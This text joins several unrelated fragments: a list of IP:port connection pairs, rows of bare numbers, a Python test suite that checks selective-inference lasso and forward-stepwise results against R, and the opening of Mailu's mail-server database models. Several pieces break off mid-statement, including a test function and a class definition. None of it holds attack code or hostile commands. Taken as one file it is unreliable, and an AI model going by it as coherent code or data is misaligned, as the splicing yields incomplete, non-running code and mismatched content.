('172.16.17.32:1112', '172.16.31.10:64367'),
('172.16.17.32:1112', '172.16.17.32:6881'),
('172.16.17.32:1112', '172.16.58.3:16921'),
('172.16.17.32:1112', '172.16.58.3:24505'),
('172.16.17.32:1112', '172.16.31.10:60027'),
('172.16.17.32:1112', '192.168.3.11:6881'),
('172.16.17.32:1112', '192.168.127.12:49165'),
('172.16.17.32:34443', '172.16.31.10:26211'),
('172.16.17.32:34443', '172.16.31.10:30814'),
('172.16.17.32:34443', '192.168.3.11:6989'),
('172.16.17.32:34443', '172.16.58.3:56912'),
('172.16.17.32:34443', '172.16.17.32:51411'),
('172.16.17.32:34443', '192.168.3.11:6881'),
('172.16.17.32:34443', '172.16.31.10:6881'),
('172.16.17.32:34443', '172.16.17.32:6881'),
('192.168.3.11:1043', '172.16.17.32:40976'),
('192.168.3.11:1043', '172.16.58.3:6881'),
('192.168.3.11:1043', '172.16.58.3:56170'),
('192.168.3.11:1043', '172.16.31.10:51413'),
('192.168.3.11:1043', '172.16.17.32:3074'),
('192.168.3.11:1043', '192.168.3.11:62219'),
('192.168.3.11:1043', '192.168.3.11:51413'),
('192.168.3.11:1043', '172.16.17.32:41241'),
('192.168.3.11:50321', '172.16.17.32:4551'),
('192.168.3.11:50321', '192.168.3.11:35526'),
('192.168.3.11:50321', '172.16.17.32:43057'),
('192.168.3.11:50321', '172.16.17.32:6881'),
('192.168.3.11:50321', '172.16.31.10:22624'),
('192.168.3.11:50321', '172.16.31.10:15765'),
('192.168.3.11:50321', '192.168.3.11:25852'),
('192.168.3.11:50321', '172.16.58.3:11917'),
('172.16.31.10:6881', '192.168.3.11:51413'),
('172.16.31.10:6881', '172.16.17.32:59431'),
('172.16.31.10:6881', '192.168.3.11:58111'),
('172.16.31.10:6881', '192.168.127.12:55240'),
('172.16.31.10:6881', | |
481 1 0 163
1 482 1 0 162
1 483 1 0 161
1 485 1 0 159
1 486 1 0 158
1 488 1 0 156
1 489 1 0 155
1 491 1 0 321
1 492 1 0 320
1 494 1 0 318
1 495 1 0 317
1 497 1 0 315
1 498 1 0 314
1 499 1 0 313
1 500 1 0 312
1 501 1 0 311
1 502 1 0 310
1 504 1 0 308
1 505 1 0 307
1 506 1 0 306
1 507 1 0 305
1 508 1 0 304
1 509 1 0 303
1 511 1 0 301
1 512 1 0 300
1 513 1 0 299
1 514 1 0 298
1 515 1 0 297
1 516 1 0 296
1 518 1 0 294
1 519 1 0 293
1 521 1 0 291
1 522 1 0 290
1 459 1 0 186
1 462 1 0 183
1 465 1 0 180
1 466 1 0 179
1 467 1 0 178
1 468 1 0 177
1 469 1 0 176
1 472 1 0 173
1 473 1 0 172
1 474 1 0 171
1 475 1 0 170
1 476 1 0 169
1 479 1 0 166
1 480 1 0 165
1 481 1 0 164
1 482 1 0 163
1 483 1 0 162
1 486 1 0 159
1 489 1 0 156
1 492 1 0 321
1 495 1 0 318
1 498 1 0 315
1 499 1 0 314
1 500 1 0 313
1 501 1 0 312
1 502 1 0 311
1 505 1 0 308
1 506 1 0 307
1 507 1 0 306
1 508 1 0 305
1 509 1 0 304
1 512 1 0 301
1 513 1 0 300
1 514 1 0 299
1 515 1 0 298
1 516 1 0 297
1 519 1 0 294
1 522 1 0 291
1 457 1 0 153
1 458 1 0 152
1 459 1 0 151
1 460 1 0 150
1 461 1 0 149
1 462 1 0 148
1 463 1 0 147
1 464 1 0 146
1 465 1 0 145
1 466 1 0 144
1 467 1 0 143
1 468 1 0 142
1 469 1 0 141
1 470 1 0 140
1 471 1 0 139
1 472 1 0 138
1 473 1 0 137
1 474 1 0 136
1 475 1 0 135
1 476 1 0 134
1 477 1 0 133
1 478 1 0 132
1 479 1 0 131
1 480 1 0 130
1 481 1 0 129
1 482 1 0 128
1 483 1 0 127
1 484 1 0 126
1 485 1 0 125
1 486 1 0 124
1 487 1 0 123
1 488 1 0 122
1 489 1 0 121
1 490 1 0 288
1 491 1 0 287
1 492 1 0 286
1 493 1 0 285
1 494 1 0 284
1 495 1 0 283
1 496 1 0 282
1 497 1 0 281
1 498 1 0 280
1 499 1 0 279
1 500 1 0 278
1 501 1 0 277
1 502 1 0 276
1 503 1 0 275
1 504 1 0 274
1 505 1 0 273
1 506 1 0 272
1 507 1 0 271
1 508 1 0 270
1 509 1 0 269
1 510 1 0 268
1 511 1 0 267
1 512 1 0 266
1 513 1 0 265
1 514 1 0 264
1 515 1 0 263
1 516 1 0 262
1 517 1 0 261
1 518 1 0 260
1 519 1 0 259
1 520 1 0 258
1 521 1 0 257
1 522 1 0 256
1 457 1 0 152
1 458 1 0 151
1 460 1 0 149
1 461 1 0 148
1 463 1 0 146
1 464 1 0 145
1 465 1 0 144
1 466 1 0 143
1 467 1 0 142
1 468 1 0 141
1 470 1 0 139
1 471 1 0 138
1 472 1 0 137
1 473 1 0 136
1 474 1 0 135
1 475 1 0 134
1 477 1 0 132
1 478 1 0 131
1 479 1 0 130
1 480 1 0 129
1 481 1 0 128
1 482 1 0 127
1 484 1 0 125
1 485 1 0 124
1 487 1 0 122
1 488 1 0 121
1 490 1 0 287
1 491 1 0 286
1 493 1 0 284
1 494 1 0 283
1 496 1 0 281
1 497 1 0 280
1 498 1 0 279
1 499 1 0 278
1 500 1 0 277
1 501 1 0 276
1 503 1 0 274
1 504 1 0 273
1 505 1 0 272
1 506 1 0 271
1 507 1 0 270
1 508 1 0 269
1 510 1 0 267
1 511 1 0 266
1 512 1 0 265
1 513 1 0 264
1 514 1 0 263
1 515 1 0 262
1 517 1 0 260
1 518 1 0 259
1 520 1 0 257
1 521 1 0 256
1 457 1 0 151
1 460 1 0 148
1 463 1 0 145
1 464 1 0 144
1 465 1 0 143
1 466 1 0 142
1 467 1 0 141
1 470 1 0 138
1 471 1 0 137
1 472 1 0 136
1 473 1 0 135
1 474 1 0 134
1 477 1 0 131
1 478 1 0 130
1 479 1 0 129
1 480 1 0 128
1 481 1 0 127
1 484 1 0 124
1 487 1 0 121
1 490 1 0 286
1 493 1 0 283
1 496 1 0 280
1 497 1 0 279
1 498 1 0 278
1 499 1 0 277
1 500 1 0 276
1 503 1 0 273
1 504 1 0 272
1 505 1 0 271
1 506 1 0 270
1 507 1 0 269
1 510 1 0 266
1 511 1 0 265
1 512 1 0 264
1 513 1 0 263
1 514 1 0 262
1 517 1 0 259
1 520 1 0 256
1 457 1 0 120
1 458 1 0 119
1 459 1 0 118
1 460 1 0 117
1 461 1 0 116
1 462 1 0 115
1 463 1 0 114
1 464 1 0 113
1 465 1 0 112
1 466 1 0 111
1 467 1 0 110
1 468 1 0 109
1 469 1 0 108
1 470 1 0 107
1 471 1 0 106
1 472 1 0 105
1 473 1 0 104
1 474 1 0 103
1 475 1 0 102
1 476 1 0 101
1 477 1 0 100
1 478 1 0 99
1 479 1 0 98
1 480 1 0 97
1 481 1 0 96
1 482 1 0 95
1 483 1 0 94
1 484 1 0 93
1 485 1 0 92
1 486 1 0 91
1 487 1 0 90
1 488 1 0 89
1 489 1 0 88
1 490 1 0 255
1 491 1 0 254
1 492 1 0 253
1 493 1 0 252
1 494 1 0 251
1 495 1 0 250
1 496 1 0 249
1 497 1 0 248
1 498 1 0 247
1 499 1 0 246
1 500 1 0 245
1 501 1 0 244
1 502 1 0 243
1 503 1 0 242
1 504 1 0 241
1 505 1 0 240
1 506 1 0 239
1 507 1 0 238
1 508 1 0 237
1 509 1 0 236
1 510 1 0 235
1 511 1 0 234
1 512 1 0 233
1 513 1 0 232
1 514 1 0 231
1 515 1 0 230
1 516 1 0 229
1 517 1 0 228
1 518 1 0 227
1 519 1 0 226
1 520 1 0 225
1 521 1 0 224
1 522 1 0 223
1 457 1 0 117
1 458 1 0 116
1 459 1 0 115
1 470 1 0 114
1 471 1 0 113
1 472 1 0 112
1 473 1 0 111
1 474 1 0 110
1 475 1 0 109
1 476 1 0 108
1 477 1 0 107
1 478 1 0 106
1 479 1 0 105
1 480 1 0 104
1 481 1 0 103
1 482 1 0 102
1 483 1 0 101
1 460 1 0 98
1 461 1 0 97
1 462 1 0 96
1 465 1 0 93
1 466 1 0 92
1 467 1 0 91
1 484 1 0 90
1 485 1 0 89
1 486 1 0 88
1 490 1 0 252
1 | |
<reponame>kevinbfry/selective-inference
from __future__ import print_function
import numpy as np, pandas as pd
import regreg.api as rr
import nose.tools as nt
from numpy.testing import dec
try:
import rpy2.robjects as rpy
rpy2_available = True
import rpy2.robjects.numpy2ri as numpy2ri
except ImportError:
rpy2_available = False
try:
import statsmodels.api as sm
statsmodels_available = True
except ImportError:
statsmodels_available = False
from ..lasso import lasso, ROSI
from ..forward_step import forward_step
from ...randomized.lasso import lasso as rlasso, selected_targets, full_targets, debiased_targets
from ...tests.instance import gaussian_instance, logistic_instance
@dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_fixed_lambda():
"""
Check that Gaussian LASSO results agree with R
"""
tol = 1.e-5
for s in [1,1.1]:
lam = 7.8
R_code = """
library(selectiveInference)
set.seed(43)
n = 50
p = 10
sigma = %f
x = matrix(rnorm(n*p),n,p)
x=scale(x,TRUE,TRUE)
beta = c(3,-2,rep(0,p-2))
y = x%%*%%beta + sigma*rnorm(n)
# first run glmnet
gfit = glmnet(x,y,standardize=FALSE)
# extract coef for a given lambda; note the 1/n factor!
# (and we don't save the intercept term)
lam = %f
beta_hat = coef(gfit, s=lam/n, exact=TRUE, x=x, y=y)
beta_hat = beta_hat[-1]
# compute fixed lambda p-values and selection intervals
out = fixedLassoInf(x,y,beta_hat,lam,sigma=sigma)
vlo = out$vlo
vup = out$vup
sdvar = out$sd
pval=out$pv
coef0=out$coef0
vars=out$vars
print(coef(lm(y ~ x[,out$vars])))
out
""" % (s, lam)
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
selected_vars = np.asarray(rpy.r('vars'))
coef = np.asarray(rpy.r('coef0')).reshape(-1)
sdvar = np.asarray(rpy.r('sdvar'))
y = np.asarray(rpy.r('y'))
beta_hat = np.asarray(rpy.r('as.numeric(beta_hat)'))
x = np.asarray(rpy.r('x'))
x = np.hstack([np.ones((x.shape[0], 1)), x])
y = y.reshape(-1)
#y -= y.mean()
L = lasso.gaussian(x, y, lam, sigma=s)
L.fit(solve_args={'min_its':200})
S = L.summary('onesided')
yield np.testing.assert_allclose, L.fit()[1:], beta_hat, 1.e-2, 1.e-2, False, 'fixed lambda, sigma=%f coef' % s
yield np.testing.assert_equal, L.active, selected_vars
yield np.testing.assert_allclose, S['pvalue'], R_pvals, tol, tol, False, 'fixed lambda, sigma=%f pval' % s
yield np.testing.assert_allclose, S['sd'], sdvar, tol, tol, False, 'fixed lambda, sigma=%f sd ' % s
yield np.testing.assert_allclose, S['onestep'], coef, tol, tol, False, 'fixed lambda, sigma=%f estimator' % s
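# Illustrative sketch (not part of the original test suite): the R comment
# above relies on glmnet's 1/n scaling -- glmnet minimizes
# (1/(2n))||y - X b||^2 + lam_glmnet ||b||_1, while this package and
# fixedLassoInf use (1/2)||y - X b||^2 + lam ||b||_1, hence s = lam / n.
def _demo_glmnet_lambda_scaling(n=50, p=10, lam=7.8, seed=0):
    """Check numerically that the two objectives differ only by a factor n
    when lam_glmnet = lam / n, so they share the same minimizer."""
    rng = np.random.RandomState(seed)
    X = rng.standard_normal((n, p))
    y = rng.standard_normal(n)
    beta = rng.standard_normal(p)
    unscaled = 0.5 * np.sum((y - X.dot(beta)) ** 2) + lam * np.sum(np.abs(beta))
    glmnet_style = 0.5 / n * np.sum((y - X.dot(beta)) ** 2) + lam / n * np.sum(np.abs(beta))
    return np.allclose(unscaled, n * glmnet_style)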
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_forward_step():
"""
Check that forward step results agree with R
"""
tol = 1.e-5
R_code = """
library(selectiveInference)
set.seed(33)
n = 50
p = 10
sigma = 1.1
x = matrix(rnorm(n*p),n,p)
beta = c(3,2,rep(0,p-2))
y = x%*%beta + sigma*rnorm(n)
# run forward stepwise
fsfit = fs(x,y)
beta_hat = fsfit$beta
# compute sequential p-values and confidence intervals
out.seq = fsInf(fsfit,sigma=sigma)
vars = out.seq$vars
pval = out.seq$pv
vlo = out.seq$vlo
vup = out.seq$vup
"""
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
sigma = float(np.asarray(rpy.r('sigma')))
selected_vars = np.asarray(rpy.r('vars'))
y = np.asarray(rpy.r('y'))
beta_hat = np.asarray(rpy.r('beta_hat'))
x = np.asarray(rpy.r('x'))
y = y.reshape(-1)
y -= y.mean()
x -= x.mean(0)[None,:]
vlo = np.asarray(rpy.r('vlo'))
vup = np.asarray(rpy.r('vup'))
print(np.vstack([vlo, vup]).T)
FS = forward_step(x, y, covariance=sigma**2 * np.identity(y.shape[0]))
steps = []
for i in range(x.shape[1]):
FS.step()
steps.extend(FS.model_pivots(i+1,
which_var=FS.variables[-1:],
alternative='onesided'))
print(selected_vars, [i+1 for i, p in steps])
print(FS.variables, FS.signs)
np.testing.assert_array_equal(selected_vars, [i + 1 for i, p in steps])
np.testing.assert_allclose([p for i, p in steps], R_pvals, atol=tol, rtol=tol)
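# Illustrative sketch (hypothetical helper, not used by the tests): a single
# plain forward-stepwise step, as exercised above, adds the column most
# correlated with the current residual; FS.step() does this plus the
# bookkeeping needed for the selective pivots.
def _demo_forward_step_pick(X, resid):
    """Return the index j maximizing |X[:, j]' resid| (columns assumed centered)."""
    return int(np.argmax(np.abs(X.T.dot(resid))))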
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_forward_step_all():
"""
Check that forward step results agree with R when type='all' (first 5 steps)
"""
tol = 1.e-5
R_code = """
library(selectiveInference)
set.seed(33)
n = 50
p = 10
sigma = 1.1
x = matrix(rnorm(n*p),n,p)
beta = c(3,2,rep(0,p-2))
y = x%*%beta + sigma*rnorm(n)
# run forward stepwise
fsfit = fs(x,y)
beta_hat = fsfit$beta
# compute sequential p-values and confidence intervals
out.seq = fsInf(fsfit,sigma=sigma, type='all', k=5)
vars = out.seq$vars
pval = out.seq$pv
"""
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
sigma = float(np.asarray(rpy.r('sigma')))
selected_vars = np.asarray(rpy.r('vars'))
y = np.asarray(rpy.r('y'))
beta_hat = np.asarray(rpy.r('beta_hat'))
x = np.asarray(rpy.r('x'))
y = y.reshape(-1)
y -= y.mean()
x -= x.mean(0)[None,:]
vlo = np.asarray(rpy.r('vlo'))
vup = np.asarray(rpy.r('vup'))
print(np.vstack([vlo, vup]).T)
FS = forward_step(x, y, covariance=sigma**2 * np.identity(y.shape[0]))
steps = []
for i in range(5):
FS.step()
steps = FS.model_pivots(5,
alternative='onesided')
np.testing.assert_array_equal(selected_vars, [i + 1 for i, p in steps])
np.testing.assert_allclose([p for i, p in steps], R_pvals, atol=tol, rtol=tol)
print(R_pvals, [p for i, p in steps])
@np.testing.dec.skipif(not rpy2_available or not statsmodels_available, msg="rpy2 not available, skipping test")
def test_coxph():
"""
Check that Cox results agree with R
"""
tol = 1.e-5
R_code = """
library(selectiveInference)
set.seed(43)
n = 50
p = 10
sigma = 1.1
x = matrix(rnorm(n*p),n,p)
x=scale(x,TRUE,TRUE)
beta = c(3,2,rep(0,p-2))
tim = as.vector(x%*%beta + sigma*rnorm(n))
tim= tim-min(tim)+1
status=sample(c(0,1),size=n,replace=T)
# first run glmnet
gfit = glmnet(x,Surv(tim,status),standardize=FALSE,family="cox", thresh=1.e-14)
# extract coef for a given lambda; note the 1/n factor!
lambda = 1.5
beta_hat = as.numeric(coef(gfit, s=lambda/n, exact=TRUE, x=x, y=Surv(tim, status)))
# compute fixed lambda p-values and selection intervals
out = fixedLassoInf(x,tim,beta_hat,lambda,status=status,family="cox")
pval = out$pv
vars_cox = out$var
"""
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
selected_vars = np.asarray(rpy.r('vars_cox'))
tim = np.asarray(rpy.r('tim'))
tim = tim.reshape(-1)
status = np.asarray(rpy.r('status'))
status = status.reshape(-1)
beta_hat = np.asarray(rpy.r('beta_hat'))
x = np.asarray(rpy.r('x'))
L = lasso.cox(x, tim, status, 1.5)
beta2 = L.fit()
G1 = L.loglike.gradient(beta_hat)
G2 = L.loglike.gradient(beta2)
print(G1, 'glmnet')
print(G2, 'regreg')
yield np.testing.assert_equal, np.array(L.active) + 1, selected_vars
yield np.testing.assert_allclose, beta2, beta_hat, tol, tol, False, 'cox coeff'
yield np.testing.assert_allclose, L.summary('onesided')['pvalue'], R_pvals, tol, tol, False, 'cox pvalues'
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_logistic():
"""
Check that logistic results agree with R
"""
tol = 1.e-4
R_code = """
library(selectiveInference)
set.seed(43)
n = 50
p = 10
sigma = 10
x = matrix(rnorm(n*p),n,p)
x=scale(x,TRUE,TRUE)
beta = c(3,2,rep(0,p-2))
y = x %*% beta + sigma * rnorm(n)
y=1*(y>mean(y))
# first run glmnet
gfit = glmnet(x,y,standardize=FALSE,family="binomial")
# extract coef for a given lambda; note the 1/n factor!
# (and here we DO include the intercept term)
lambda = .8
beta_hat = as.numeric(coef(gfit, s=lambda/n, exact=TRUE, x=x, y=y))
# compute fixed lambda p-values and selection intervals
out = fixedLassoInf(x,y,beta_hat,lambda,family="binomial")
vlo = out$vlo
vup = out$vup
sdvar = out$sd
coef=out$coef0
info_mat=out$info.matrix
beta_hat = beta_hat[c(1, out$vars+1)]
out
pval = out$pv
vars_logit = out$var
"""
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
selected_vars = np.asarray(rpy.r('vars_logit'))
y = np.asarray(rpy.r('y'))
y = y.reshape(-1)
beta_hat = np.asarray(rpy.r('as.numeric(beta_hat)'))
x = np.asarray(rpy.r('x'))
x = np.hstack([np.ones((x.shape[0],1)), x])
L = lasso.logistic(x, y, [0] + [0.8] * (x.shape[1]-1))
beta2 = L.fit()[L.active]
yield np.testing.assert_equal, L.active[1:], selected_vars
yield np.testing.assert_allclose, beta2, beta_hat, tol, tol, False, 'logistic coef'
yield np.testing.assert_allclose, L.summary('onesided')['pvalue'][1:], R_pvals, tol, tol, False, 'logistic pvalues'
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_solve_QP_lasso():
"""
Check the R coordinate descent LASSO solver
"""
n, p = 100, 200
lam = 0.1
X = np.random.standard_normal((n, p))
Y = np.random.standard_normal(n)
loss = rr.squared_error(X, Y, coef=1./n)
pen = rr.l1norm(p, lagrange=lam)
problem = rr.simple_problem(loss, pen)
soln = problem.solve(min_its=500, tol=1.e-12)
numpy2ri.activate()
rpy.r.assign('X', X)
rpy.r.assign('Y', Y)
rpy.r.assign('lam', lam)
R_code = """
library(selectiveInference)
p = ncol(X)
n = nrow(X)
soln_R = rep(0, p)
grad = -t(X) %*% Y / n
ever_active = as.integer(c(1, rep(0, p-1)))
nactive = as.integer(1)
kkt_tol = 1.e-12
objective_tol = 1.e-16
parameter_tol = 1.e-10
maxiter = 500
soln_R = selectiveInference:::solve_QP(t(X) %*% X / n,
lam,
maxiter,
soln_R,
1. * grad,
grad,
ever_active,
nactive,
kkt_tol,
objective_tol,
parameter_tol,
p,
TRUE,
TRUE,
TRUE)$soln
# test wide solver
Xtheta = rep(0, n)
nactive = as.integer(1)
ever_active = as.integer(c(1, rep(0, p-1)))
soln_R_wide = rep(0, p)
grad = - t(X) %*% Y / n
soln_R_wide = selectiveInference:::solve_QP_wide(X,
rep(lam, p),
0,
maxiter,
soln_R_wide,
1. * grad,
grad,
Xtheta,
ever_active,
nactive,
kkt_tol,
objective_tol,
parameter_tol,
p,
TRUE,
TRUE,
TRUE)$soln
"""
rpy.r(R_code)
soln_R = np.asarray(rpy.r('soln_R'))
soln_R_wide = np.asarray(rpy.r('soln_R_wide'))
numpy2ri.deactivate()
tol = 1.e-5
print(soln - soln_R)
print(soln_R - soln_R_wide)
yield np.testing.assert_allclose, soln, soln_R, tol, tol, False, 'checking coordinate QP solver for LASSO problem'
yield np.testing.assert_allclose, soln, soln_R_wide, tol, tol, False, 'checking wide coordinate QP solver for LASSO problem'
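# Illustrative sketch (hypothetical helper): a direct KKT check for the LASSO
# solutions compared above. With loss (1/(2n))||Y - X b||^2 and penalty
# lam ||b||_1, the smooth gradient g = -X'(Y - X b)/n must satisfy
# |g_j| <= lam for every j and g_j = -lam * sign(b_j) on the active set.
def _demo_lasso_kkt_check(X, Y, soln, lam, tol=1.e-4):
    n = X.shape[0]
    grad = -X.T.dot(Y - X.dot(soln)) / n
    active = soln != 0
    bound_ok = np.all(np.abs(grad) <= lam + tol)
    sign_ok = np.allclose(grad[active], -lam * np.sign(soln[active]), atol=tol)
    return bound_ok and sign_ok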
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_solve_QP():
"""
Check the R coordinate descent solver on a general QP (a LASSO problem with an added linear term)
"""
n, p = 100, 50
lam = 0.08
X = np.random.standard_normal((n, p))
loss = rr.squared_error(X, np.zeros(n), coef=1./n)
pen = rr.l1norm(p, lagrange=lam)
E = np.zeros(p)
E[2] = 1
Q = rr.identity_quadratic(0, 0, E, 0)
problem = rr.simple_problem(loss, pen)
soln = problem.solve(Q, min_its=500, tol=1.e-12)
numpy2ri.activate()
rpy.r.assign('X', X)
rpy.r.assign('E', E)
rpy.r.assign('lam', lam)
R_code = """
library(selectiveInference)
p = ncol(X)
n = nrow(X)
soln_R = rep(0, p)
grad = 1. * E
ever_active = as.integer(c(1, rep(0, p-1)))
nactive = as.integer(1)
kkt_tol = 1.e-12
objective_tol = 1.e-16
parameter_tol = | |
<reponame>tothadi/Mailu
""" Mailu config storage model
"""
import os
import smtplib
import json
from datetime import date
from email.mime import text
from itertools import chain
import flask_sqlalchemy
import sqlalchemy
import passlib.context
import passlib.hash
import passlib.registry
import time
import hmac
import idna
import dns.resolver
import dns.exception
from flask import current_app as app
from sqlalchemy.ext import declarative
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.inspection import inspect
from werkzeug.utils import cached_property
from mailu import dkim
db = flask_sqlalchemy.SQLAlchemy()
class IdnaDomain(db.TypeDecorator):
""" Stores a Unicode string in it's IDNA representation (ASCII only)
"""
impl = db.String(80)
def process_bind_param(self, value, dialect):
""" encode unicode domain name to punycode """
return idna.encode(value.lower()).decode('ascii')
def process_result_value(self, value, dialect):
""" decode punycode domain name to unicode """
return idna.decode(value)
python_type = str
class IdnaEmail(db.TypeDecorator):
""" Stores a Unicode string in it's IDNA representation (ASCII only)
"""
impl = db.String(255)
def process_bind_param(self, value, dialect):
""" encode unicode domain part of email address to punycode """
localpart, domain_name = value.rsplit('@', 1)
if '@' in localpart:
raise ValueError('email local part must not contain "@"')
domain_name = domain_name.lower()
return f'{localpart}@{idna.encode(domain_name).decode("ascii")}'
def process_result_value(self, value, dialect):
""" decode punycode domain part of email to unicode """
localpart, domain_name = value.rsplit('@', 1)
return f'{localpart}@{idna.decode(domain_name)}'
python_type = str
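# Illustrative sketch (not used by the application): the round trip the two
# decorators above perform at the SQL boundary -- Unicode in Python, punycode
# (ASCII) in the database; the address below is hypothetical.
def _demo_idna_roundtrip(email='postmaster@bücher.example'):
    localpart, domain_name = email.rsplit('@', 1)
    stored = f'{localpart}@{idna.encode(domain_name.lower()).decode("ascii")}'
    restored = f'{localpart}@{idna.decode(stored.rsplit("@", 1)[1])}'
    return stored, restored  # stored is 'postmaster@xn--bcher-kva.example'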
class CommaSeparatedList(db.TypeDecorator):
""" Stores a list as a comma-separated string, compatible with Postfix.
"""
impl = db.String
def process_bind_param(self, value, dialect):
""" join list of items to comma separated string """
if not isinstance(value, (list, tuple, set)):
raise TypeError('Must be a list of strings')
for item in value:
if ',' in item:
raise ValueError('list item must not contain ","')
return ','.join(sorted(set(value)))
def process_result_value(self, value, dialect):
""" split comma separated string to list """
return list(filter(bool, (item.strip() for item in value.split(',')))) if value else []
python_type = list
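# Illustrative sketch (not used by the application): what CommaSeparatedList
# does on the way in and out -- duplicates dropped, order normalized, and the
# stored string split back into a list on load.
def _demo_comma_list_roundtrip(items=('b@example.com', 'a@example.com', 'a@example.com')):
    stored = ','.join(sorted(set(items)))  # 'a@example.com,b@example.com'
    loaded = list(filter(bool, (item.strip() for item in stored.split(','))))
    return stored, loaded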
class JSONEncoded(db.TypeDecorator):
""" Represents an immutable structure as a json-encoded string.
"""
impl = db.String
def process_bind_param(self, value, dialect):
""" encode data as json """
return json.dumps(value) if value else None
def process_result_value(self, value, dialect):
""" decode json to data """
return json.loads(value) if value else None
python_type = str
class Base(db.Model):
""" Base class for all models
"""
__abstract__ = True
metadata = sqlalchemy.schema.MetaData(
naming_convention={
'fk': '%(table_name)s_%(column_0_name)s_fkey',
'pk': '%(table_name)s_pkey'
}
)
created_at = db.Column(db.Date, nullable=False, default=date.today)
updated_at = db.Column(db.Date, nullable=True, onupdate=date.today)
comment = db.Column(db.String(255), nullable=True, default='')
def __str__(self):
pkey = self.__table__.primary_key.columns.values()[0].name
if pkey == 'email':
# ugly hack for email declared attr. _email is not always up2date
return str(f'{self.localpart}@{self.domain_name}')
return str(getattr(self, pkey))
def __repr__(self):
return f'<{self.__class__.__name__} {str(self)!r}>'
def __eq__(self, other):
if isinstance(other, self.__class__):
pkey = self.__table__.primary_key.columns.values()[0].name
this = getattr(self, pkey, None)
other = getattr(other, pkey, None)
return this is not None and other is not None and str(this) == str(other)
else:
return NotImplemented
# we need hashable instances here for sqlalchemy to update collections
# in collections.bulk_replace, but auto-incremented rows don't always have
# a valid primary key yet; in that case we use the object's id
__hashed = None
def __hash__(self):
if self.__hashed is None:
primary = getattr(self, self.__table__.primary_key.columns.values()[0].name)
self.__hashed = id(self) if primary is None else hash(primary)
return self.__hashed
# Many-to-many association table for domain managers
managers = db.Table('manager', Base.metadata,
db.Column('domain_name', IdnaDomain, db.ForeignKey('domain.name')),
db.Column('user_email', IdnaEmail, db.ForeignKey('user.email'))
)
class Config(Base):
""" In-database configuration values
"""
name = db.Column(db.String(255), primary_key=True, nullable=False)
value = db.Column(JSONEncoded)
def _save_dkim_keys(session):
""" store DKIM keys after commit """
for obj in session.identity_map.values():
if isinstance(obj, Domain):
obj.save_dkim_key()
class Domain(Base):
""" A DNS domain that has mail addresses associated to it.
"""
__tablename__ = 'domain'
name = db.Column(IdnaDomain, primary_key=True, nullable=False)
managers = db.relationship('User', secondary=managers,
backref=db.backref('manager_of'), lazy='dynamic')
max_users = db.Column(db.Integer, nullable=False, default=-1)
max_aliases = db.Column(db.Integer, nullable=False, default=-1)
max_quota_bytes = db.Column(db.BigInteger, nullable=False, default=0)
signup_enabled = db.Column(db.Boolean, nullable=False, default=False)
_dkim_key = None
_dkim_key_on_disk = None
def _dkim_file(self):
""" return filename for active DKIM key """
return app.config['DKIM_PATH'].format(
domain=self.name,
selector=app.config['DKIM_SELECTOR']
)
def save_dkim_key(self):
""" save changed DKIM key to disk """
if self._dkim_key != self._dkim_key_on_disk:
file_path = self._dkim_file()
if self._dkim_key:
with open(file_path, 'wb') as handle:
handle.write(self._dkim_key)
elif os.path.exists(file_path):
os.unlink(file_path)
self._dkim_key_on_disk = self._dkim_key
@property
def dns_mx(self):
""" return MX record for domain """
hostname = app.config['HOSTNAMES'].split(',', 1)[0]
return f'{self.name}. 600 IN MX 10 {hostname}.'
@property
def dns_spf(self):
""" return SPF record for domain """
hostname = app.config['HOSTNAMES'].split(',', 1)[0]
return f'{self.name}. 600 IN TXT "v=spf1 mx a:{hostname} ~all"'
@property
def dns_dkim(self):
""" return DKIM record for domain """
if self.dkim_key:
selector = app.config['DKIM_SELECTOR']
return (
f'{selector}._domainkey.{self.name}. 600 IN TXT '
f'"v=DKIM1; k=rsa; p={self.dkim_publickey}"'
)
@property
def dns_dmarc(self):
""" return DMARC record for domain """
if self.dkim_key:
domain = app.config['DOMAIN']
rua = app.config['DMARC_RUA']
rua = f' rua=mailto:{rua}@{domain};' if rua else ''
ruf = app.config['DMARC_RUF']
ruf = f' ruf=mailto:{ruf}@{domain};' if ruf else ''
return f'_dmarc.{self.name}. 600 IN TXT "v=DMARC1; p=reject;{rua}{ruf} adkim=s; aspf=s"'
@property
def dkim_key(self):
""" return private DKIM key """
if self._dkim_key is None:
file_path = self._dkim_file()
if os.path.exists(file_path):
with open(file_path, 'rb') as handle:
self._dkim_key = self._dkim_key_on_disk = handle.read()
else:
self._dkim_key = self._dkim_key_on_disk = b''
return self._dkim_key if self._dkim_key else None
@dkim_key.setter
def dkim_key(self, value):
""" set private DKIM key """
old_key = self.dkim_key
self._dkim_key = value if value is not None else b''
if self._dkim_key != old_key:
if not sqlalchemy.event.contains(db.session, 'after_commit', _save_dkim_keys):
sqlalchemy.event.listen(db.session, 'after_commit', _save_dkim_keys)
@property
def dkim_publickey(self):
""" return public part of DKIM key """
dkim_key = self.dkim_key
if dkim_key:
return dkim.strip_key(dkim_key).decode('utf8')
def generate_dkim_key(self):
""" generate and activate new DKIM key """
self.dkim_key = dkim.gen_key()
def has_email(self, localpart):
""" checks if localpart is configured for domain """
for email in chain(self.users, self.aliases):
if email.localpart == localpart:
return True
return False
def check_mx(self):
""" checks if MX record for domain points to mailu host """
try:
hostnames = set(app.config['HOSTNAMES'].split(','))
return any(
rset.exchange.to_text().rstrip('.') in hostnames
for rset in dns.resolver.query(self.name, 'MX')
)
except dns.exception.DNSException:
return False
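# Illustrative record values (hypothetical domain and hostname, not taken from the
# original code): for Domain(name='example.com') with HOSTNAMES starting with
# 'mail.example.com', the properties above produce
#   dns_mx  -> 'example.com. 600 IN MX 10 mail.example.com.'
#   dns_spf -> 'example.com. 600 IN TXT "v=spf1 mx a:mail.example.com ~all"'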
class Alternative(Base):
""" Alternative name for a served domain.
